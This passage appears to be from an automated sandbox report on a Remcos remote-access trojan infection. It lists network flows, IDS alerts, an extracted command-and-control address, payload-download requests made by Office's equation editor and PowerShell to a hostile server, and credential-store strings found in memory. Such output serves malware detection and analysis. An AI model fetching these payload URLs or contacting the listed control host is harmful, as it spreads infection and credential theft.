                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49172 -> 103.186.116.99:58934
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 103.186.116.99:58934
                Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 104.168.7.8:80 -> 192.168.2.22:49171
                Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 104.168.7.8:80 -> 192.168.2.22:49171
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 103.186.116.99:58934
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49176 -> 103.186.116.99:58934
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49177 -> 103.186.116.99:58934
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 103.186.116.99
                Connects to many ports of the same IP (likely port scanning)
                Source: global trafficTCP traffic: 103.186.116.99 ports 58934,3,4,5,8,9
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 103.186.116.99:58934
                Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /510/RFGB.txt HTTP/1.1Host: 104.168.7.8Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
                Source: Joe Sandbox ViewIP Address: 103.186.116.99 103.186.116.99
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49174 -> 178.237.33.50:80
                Source: global trafficHTTP traffic detected: GET /9aubsm HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: og1.inConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 104.168.7.8Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /510/niceworkwithpcitureupdateson.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.8Connection: Keep-Alive
                Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,13_2_0041B411
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5FD5A5F2-1D5C-4618-A34F-9D73F6355FD3}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /9aubsm HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: og1.inConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 104.168.7.8Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /510/niceworkwithpcitureupdateson.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.8Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /510/RFGB.txt HTTP/1.1Host: 104.168.7.8Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                Source: RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: og1.in
                Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 0000000C.00000002.407271629.00000000026A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.8
                Source: powershell.exe, 0000000C.00000002.407271629.00000000026A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.8/510/RFGB.txt
                Source: RN on 104.168.7.8.url.0.drString found in binary or memory: http://104.168.7.8/510/RN/
                Source: EQNEDT32.EXE, 00000008.00000002.389469062.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.8/510/niceworkwithpcitureupdateson.tIF
                Source: EQNEDT32.EXE, 00000008.00000002.389469062.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.8/510/niceworkwithpcitureupdateson.tIFj
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                Source: RegAsm.exe, 0000000D.00000002.919651598.0000000000305000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.919771377.000000000034F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: powershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: powershell.exe, 0000000C.00000002.407271629.0000000002741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                Source: powershell.exe, 0000000C.00000002.406976766.00000000001BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.cg
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                Source: bhv76C6.tmp.15.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                Source: bhv76C6.tmp.15.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
